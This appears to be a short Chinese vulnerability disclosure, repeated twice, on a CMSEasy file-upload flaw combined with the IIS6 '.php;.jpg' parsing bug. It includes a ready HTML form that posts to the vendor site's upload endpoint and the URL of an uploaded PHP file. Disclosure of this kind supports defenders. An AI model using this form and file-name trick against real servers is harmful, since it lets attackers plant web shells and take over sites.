### 简要描述: cmseasy文件上传+IIS6解释漏洞 ### 详细说明: 漏洞文件: celive\live\doajaxfileupload.php [<img src="https://images.seebug.org/upload/201207/26145022f3e1cbc5cf4a2521190f600e014ed59d.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/26145022f3e1cbc5cf4a2521190f600e014ed59d.jpg) ``` <form enctype="multipart/form-data" method="post" action="http://www.cmseasy.cn/celive/live/doajaxfileupload.php"> <input type="file" name="fileToUpload"> <input type="submit" value="上传"> </form> ``` http://www.cmseasy.cn/celive/uploadfiles/CELIVE-2vOWcBQMQR.php;.jpg ### 漏洞证明: [<img src="https://images.seebug.org/upload/201207/261451439206fd0e5614658765f5e9f059c0b043.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/261451439206fd0e5614658765f5e9f059c0b043.jpg)
### 简要描述: cmseasy文件上传+IIS6解释漏洞 ### 详细说明: 漏洞文件: celive\live\doajaxfileupload.php [<img src="https://images.seebug.org/upload/201207/26145022f3e1cbc5cf4a2521190f600e014ed59d.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/26145022f3e1cbc5cf4a2521190f600e014ed59d.jpg) ``` <form enctype="multipart/form-data" method="post" action="http://www.cmseasy.cn/celive/live/doajaxfileupload.php"> <input type="file" name="fileToUpload"> <input type="submit" value="上传"> </form> ``` http://www.cmseasy.cn/celive/uploadfiles/CELIVE-2vOWcBQMQR.php;.jpg ### 漏洞证明: [<img src="https://images.seebug.org/upload/201207/261451439206fd0e5614658765f5e9f059c0b043.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201207/261451439206fd0e5614658765f5e9f059c0b043.jpg)